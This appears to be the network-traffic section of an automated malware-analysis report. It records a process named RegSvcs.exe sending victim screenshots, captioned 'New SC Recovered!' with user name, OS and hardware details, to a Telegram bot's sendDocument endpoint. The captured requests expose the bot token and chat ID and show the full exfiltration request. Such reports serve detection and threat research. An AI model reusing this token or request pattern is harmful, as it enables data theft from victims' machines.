28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:53:30 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:53:30 UTC1360OUTData Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5
                                                                                      Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
                                                                                      2024-12-06 04:53:30 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 30 66 32 36 66 37 66 63 62 62 36 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd50f26f7fcbb6--
                                                                                      2024-12-06 04:53:30 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:53:31 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:53:31 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170409,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460811,"document":{"file_name":"user-610930 2025-02-19 14-33-53.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZqWdSg0st3hI_xA7yPyvuuaSSWF3LAAL2FAACOh6ZUqFZzL1J2ZHxAQAHbQADNgQ","file_unique_id":"AQAD9hQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZqWdSg0st3hI_xA7yPyvuuaSSWF3LAAL2FAACOh6ZUqFZzL1J2ZHxAQAHbQADNgQ","file_unique_id":"AQAD9hQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmalnUoNLLd4SP8QO8j8r7rmkklhdywAC9hQAAjoemVKhWcy9SdmR8TYE","file_unique_id":"AgAD9hQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/19/2025 14:23:53\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.450000149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:53:41 UTC238OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd567673718542
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66946
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:53:42 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 37 36 37 33 37 31 38 35 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 37 36 37 33 37 31 38 35 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 32 36 2f 32 30 32 35 20 31 35 3a 30 31 3a 32 33 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd567673718542Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd567673718542Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/26/2025 15:01:23User
                                                                                      2024-12-06 04:53:42 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:53:42 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:53:42 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:53:42 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:53:42 UTC1360OUTData Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5
                                                                                      Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
                                                                                      2024-12-06 04:53:42 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 37 36 37 33 37 31 38 35 34 32 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd567673718542--
                                                                                      2024-12-06 04:53:42 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:53:43 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:53:42 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170410,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460822,"document":{"file_name":"user-610930 2025-02-26 15-01-29.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZqmdSg1YnChBaVQxamPueraR0MRkGAAL3FAACOh6ZUlrkha8OwLk6AQAHbQADNgQ","file_unique_id":"AQAD9xQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZqmdSg1YnChBaVQxamPueraR0MRkGAAL3FAACOh6ZUlrkha8OwLk6AQAHbQADNgQ","file_unique_id":"AQAD9xQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmapnUoNWJwoQWlUMWpj7nq2kdDEZBgAC9xQAAjoemVJa5IWvDsC5OjYE","file_unique_id":"AgAD9xQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/26/2025 15:01:23\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.450006149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:53:44 UTC262OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd590601fddcca
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66946
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-06 04:53:45 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 39 30 36 30 31 66 64 64 63 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 39 30 36 30 31 66 64 64 63 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 30 31 2f 32 30 32 35 20 32 31 3a 30 34 3a 30 37 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd590601fddccaContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd590601fddccaContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/01/2025 21:04:07User
                                                                                      2024-12-06 04:53:45 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:53:45 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:53:45 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:53:45 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:53:45 UTC1360OUTData Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5
                                                                                      Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
                                                                                      2024-12-06 04:53:45 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 39 30 36 30 31 66 64 64 63 63 61 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd590601fddcca--
                                                                                      2024-12-06 04:53:45 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:53:46 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:53:45 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170411,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460825,"document":{"file_name":"user-610930 2025-03-01 21-14-09.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZq2dSg1ldLmFRiUqELUndsEjBXZXBAAL4FAACOh6ZUkJ1BXTjUa1GAQAHbQADNgQ","file_unique_id":"AQAD-BQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZq2dSg1ldLmFRiUqELUndsEjBXZXBAAL4FAACOh6ZUkJ1BXTjUa1GAQAHbQADNgQ","file_unique_id":"AQAD-BQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmatnUoNZXS5hUYlKhC1J3bBIwV2VwQAC-BQAAjoemVJCdQV041GtRjYE","file_unique_id":"AgAD-BQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 03/01/2025 21:04:07\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
